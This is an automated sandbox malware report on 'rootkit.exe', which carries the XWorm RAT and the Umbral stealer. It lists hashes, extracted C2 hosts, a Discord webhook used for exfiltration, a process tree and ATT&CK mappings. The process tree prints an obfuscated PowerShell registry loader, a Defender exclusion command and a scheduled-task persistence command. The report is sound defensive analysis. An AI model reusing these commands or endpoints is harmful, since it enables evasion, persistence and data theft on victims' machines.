Overview

overview

10

Static

static

3

rootkit.exe

windows7-x64

10

rootkit.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    08-07-2024 17:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rootkit.exe

  • Size

    274KB

  • MD5

    87119ce97d460721e8c6cb98f990c780

  • SHA1

    eac69d7550546b7812eb5701e82e079ff780d93a

  • SHA256

    f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

  • SHA512

    fce0177ad8df7622692919ff8493a9194b806774ca8508a4d28414d75e400bdf26b41818f12ad61a15a0860611d0d978d74660b970b9738c3d2b651e25290fcb

  • SSDEEP

    6144:WZL665pSvWs4dNwLIdh+JR5d3fFbeT8UumB2p3H1s93LZG9B:WlKWtnvKR51fy8VZKTo

Score
10/10
umbralxwormevasionexecutionpersistenceratstealertrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:49403

quotes-suites.gl.at.ply:49403

quotes-suites.gl.at.ply.gg:49403
Mutex

25nhnSSJeo8OHnH7

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

aes.plain

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1259895160632905769/Nt8uggl0mEBvysXT-BFIchzGoOqiC8hi2bWhb_ujCX5_THJiU5kiutfTRZpNtRkHK8Jq

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
    evasion
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:428
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{a2452c33-c5ab-4e6d-809b-15f4873b33e7}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2148
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:472
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:600
          • C:\Windows\system32\wbem\wmiprvse.exe
            C:\Windows\system32\wbem\wmiprvse.exe
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1312
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:1444
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              3⤵
                PID:1124
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k RPCSS
              2⤵
                PID:676
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                2⤵
                • Modifies security service
                PID:752
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                2⤵
                  PID:824
                  • C:\Windows\system32\Dwm.exe
                    "C:\Windows\system32\Dwm.exe"
                    3⤵
                      PID:1168
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:860
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {8ED4C929-B5AF-4994-9499-5E66336DC382} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2664
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'w'+''+[Char](119)+''+'w'+'s'+'t'+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                        4⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3056
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    2⤵
                      PID:972
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:284
                      • C:\Windows\System32\spoolsv.exe
                        C:\Windows\System32\spoolsv.exe
                        2⤵
                          PID:892
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                          2⤵
                            PID:1076
                          • C:\Windows\system32\taskhost.exe
                            "taskhost.exe"
                            2⤵
                              PID:1088
                            • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                              "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                              2⤵
                                PID:2032
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                2⤵
                                  PID:2276
                                • C:\Windows\system32\sppsvc.exe
                                  C:\Windows\system32\sppsvc.exe
                                  2⤵
                                    PID:2452
                                • C:\Windows\system32\lsass.exe
                                  C:\Windows\system32\lsass.exe
                                  1⤵
                                    PID:488
                                  • C:\Windows\system32\lsm.exe
                                    C:\Windows\system32\lsm.exe
                                    1⤵
                                      PID:496
                                    • C:\Windows\Explorer.EXE
                                      C:\Windows\Explorer.EXE
                                      1⤵
                                      • Suspicious behavior: GetForegroundWindowSpam
                                      PID:1212
                                      • C:\Users\Admin\AppData\Local\Temp\rootkit.exe
                                        "C:\Users\Admin\AppData\Local\Temp\rootkit.exe"
                                        2⤵
                                        • Adds Run key to start application
                                        • Suspicious use of WriteProcessMemory
                                        PID:2972
                                        • C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
                                          "C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2060
                                        • C:\Users\Admin\AppData\Local\Temp\Modify.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Modify.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2068
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2716
                                        • C:\Windows\System32\schtasks.exe
                                          "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
                                          3⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1956
                                        • C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
                                          "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:2724
                                    • C:\Windows\system32\conhost.exe
                                      \??\C:\Windows\system32\conhost.exe "-1488989902-8233939581229876322-570263738871046913-1894565484-1302777071-363881733"
                                      1⤵
                                        PID:1784

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Reconnaissance

                                      Resource Development

                                      Initial Access

                                      Execution

                                      Command and Scripting Interpreter

                                      1
                                      T1059

                                      PowerShell

                                      1
                                      T1059.001

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      Persistence

                                      Boot or Logon Autostart Execution

                                      1
                                      T1547

                                      Registry Run Keys / Startup Folder

                                      1
                                      T1547.001

                                      Create or Modify System Process

                                      1
                                      T1543

                                      Windows Service

                                      1
                                      T1543.003

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      Privilege Escalation

                                      Boot or Logon Autostart Execution

                                      1
                                      T1547

                                      Registry Run Keys / Startup Folder

                                      1
                                      T1547.001

                                      Create or Modify System Process

                                      1
                                      T1543

                                      Windows Service

                                      1
                                      T1543.003

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      Defense Evasion

                                      Modify Registry

                                      2
                                      T1112

                                      Credential Access

                                      Discovery

                                      Query Registry

                                      1
                                      T1012

                                      System Information Discovery

                                      1
                                      T1082

                                      Lateral Movement

                                      Collection

                                      Command and Control

                                      Exfiltration

                                      Impact

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
                                        Filesize

                                        164KB

                                        MD5

                                        22d120454dd38d7f1a3f1cd0eb497f95

                                        SHA1

                                        4c11a082bf8e64b21310b959821a9f7324aa8107

                                        SHA256

                                        6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c

                                        SHA512

                                        1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\Modify.exe
                                        Filesize

                                        229KB

                                        MD5

                                        9259d8aef8f52e8ff4fa082c0074c9b0

                                        SHA1

                                        88abb68a5632812be3c18e0c740e3818d9501b3e

                                        SHA256

                                        45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db

                                        SHA512

                                        9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
                                        Filesize

                                        42KB

                                        MD5

                                        737b2d60dc5d475685b65f5c288e00c0

                                        SHA1

                                        144ba7647d8609abe4aab74d4f191e2c594dd55a

                                        SHA256

                                        69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084

                                        SHA512

                                        96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

                                        Download Submit

                                      • memory/428-47-0x0000000000B00000-0x0000000000B26000-memory.dmp

                                        Filesize

                                        152KB

                                        Download

                                      • memory/428-49-0x0000000000B00000-0x0000000000B26000-memory.dmp

                                        Filesize

                                        152KB

                                        Download

                                      • memory/428-50-0x0000000000C50000-0x0000000000C7C000-memory.dmp

                                        Filesize

                                        176KB

                                        Download

                                      • memory/428-51-0x0000000000C50000-0x0000000000C7C000-memory.dmp

                                        Filesize

                                        176KB

                                        Download

                                      • memory/428-57-0x0000000000C50000-0x0000000000C7C000-memory.dmp

                                        Filesize

                                        176KB

                                        Download

                                      • memory/428-58-0x000007FEBE4B0000-0x000007FEBE4C0000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/428-59-0x00000000374D0000-0x00000000374E0000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/472-72-0x000007FEBE4B0000-0x000007FEBE4C0000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/472-73-0x00000000374D0000-0x00000000374E0000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/472-65-0x00000000000E0000-0x000000000010C000-memory.dmp

                                        Filesize

                                        176KB

                                        Download

                                      • memory/472-71-0x00000000000E0000-0x000000000010C000-memory.dmp

                                        Filesize

                                        176KB

                                        Download

                                      • memory/488-87-0x00000000374D0000-0x00000000374E0000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/488-86-0x000007FEBE4B0000-0x000007FEBE4C0000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/488-79-0x0000000000A30000-0x0000000000A5C000-memory.dmp

                                        Filesize

                                        176KB

                                        Download

                                      • memory/488-85-0x0000000000A30000-0x0000000000A5C000-memory.dmp

                                        Filesize

                                        176KB

                                        Download

                                      • memory/496-96-0x00000000002D0000-0x00000000002FC000-memory.dmp

                                        Filesize

                                        176KB

                                        Download

                                      • memory/2060-23-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

                                        Filesize

                                        9.9MB

                                        Download

                                      • memory/2060-221-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

                                        Filesize

                                        9.9MB

                                        Download

                                      • memory/2060-15-0x00000000013D0000-0x00000000013E0000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/2068-14-0x0000000000E00000-0x0000000000E40000-memory.dmp

                                        Filesize

                                        256KB

                                        Download

                                      • memory/2148-42-0x0000000077490000-0x0000000077639000-memory.dmp

                                        Filesize

                                        1.7MB

                                        Download

                                      • memory/2148-41-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/2148-39-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/2148-38-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/2148-36-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/2148-43-0x0000000077270000-0x000000007738F000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download

                                      • memory/2148-37-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/2148-44-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/2716-21-0x0000000002690000-0x0000000002698000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/2716-20-0x000000001B7B0000-0x000000001BA92000-memory.dmp

                                        Filesize

                                        2.9MB

                                        Download

                                      • memory/2972-0-0x000007FEF5803000-0x000007FEF5804000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2972-22-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

                                        Filesize

                                        9.9MB

                                        Download

                                      • memory/2972-1-0x0000000000E30000-0x0000000000E7A000-memory.dmp

                                        Filesize

                                        296KB

                                        Download

                                      • memory/2972-30-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

                                        Filesize

                                        9.9MB

                                        Download

                                      • memory/3056-34-0x0000000077490000-0x0000000077639000-memory.dmp

                                        Filesize

                                        1.7MB

                                        Download

                                      • memory/3056-31-0x000000001A0B0000-0x000000001A392000-memory.dmp

                                        Filesize

                                        2.9MB

                                        Download

                                      • memory/3056-32-0x0000000000970000-0x0000000000978000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/3056-33-0x00000000012F0000-0x000000000131A000-memory.dmp

                                        Filesize

                                        168KB

                                        Download

                                      • memory/3056-35-0x0000000077270000-0x000000007738F000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download